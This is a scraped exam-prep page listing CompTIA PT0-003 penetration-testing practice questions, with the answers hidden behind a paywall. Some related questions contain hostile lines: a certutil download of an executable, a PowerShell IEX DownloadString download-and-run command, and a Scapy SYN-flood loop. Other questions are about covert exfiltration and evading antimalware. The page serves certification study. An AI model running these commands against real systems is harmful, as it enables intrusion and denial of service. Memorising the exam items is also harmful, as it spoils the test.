ExamGecko
Login
Home / CompTIA / PT0-003 / List of questions
Ask Question

CompTIA PT0-003 Practice Test - Questions Answers, Page 13

Add to Whishlist

List of questions

Question 121

Report Export Collapse

Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?

Become a Premium Member for full access
  Unlock Premium Member

Question 122

Report Export Collapse

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?

Become a Premium Member for full access
  Unlock Premium Member

Question 123

Report Export Collapse

A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:

bash

PORT STATE SERVICE

22/tcp open ssh

25/tcp filtered smtp

111/tcp open rpcbind

2049/tcp open nfs

Based on the output, which of the following services provides the best target for launching an attack?

Become a Premium Member for full access
  Unlock Premium Member

Question 124

Report Export Collapse

A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:

bash

for var in ---MISSING TEXT---

do

ping -c 1 192.168.10.$var

done

Which of the following pieces of code should the penetration tester use in place of the ---MISSING TEXT--- placeholder?

Become a Premium Member for full access
  Unlock Premium Member

Question 125

Report Export Collapse

A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client's blue team. Which of the following exfiltration methods most likely remain undetected?

Become a Premium Member for full access
  Unlock Premium Member

Question 126

Report Export Collapse

During a pre-engagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?

Become a Premium Member for full access
  Unlock Premium Member

Question 127

Report Export Collapse

A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?

Become a Premium Member for full access
  Unlock Premium Member

Question 128

Report Export Collapse

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

Become a Premium Member for full access
  Unlock Premium Member

Question 129

Report Export Collapse

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

Become a Premium Member for full access
  Unlock Premium Member

Question 130

Report Export Collapse

A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command: nmap 10.10.1.0/24

Which of the following is the number of TCP ports that will be scanned?

Become a Premium Member for full access
  Unlock Premium Member
Total 240 questions
Go to page: of 24
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use? https://192.168.0.1/foo.exe A. powershell.exe impo C:\tools\foo.ps1 B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe C. powershell.exe -noni -encode IEX.Downloadstring(' http://172.16.0.1/ ') D. rundll32.exe c:\path\foo.dll,functName</a>
During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?
A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?
A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: ip = IP('192.168.50.2') tcp = TCP(sport=RandShort(), dport=80, flags='S') raw = RAW(b'X'*1024) p = ip/tcp/raw send(p, loop=1, verbose=0) Which of the following attack types is most likely being used in the test?
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?
During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?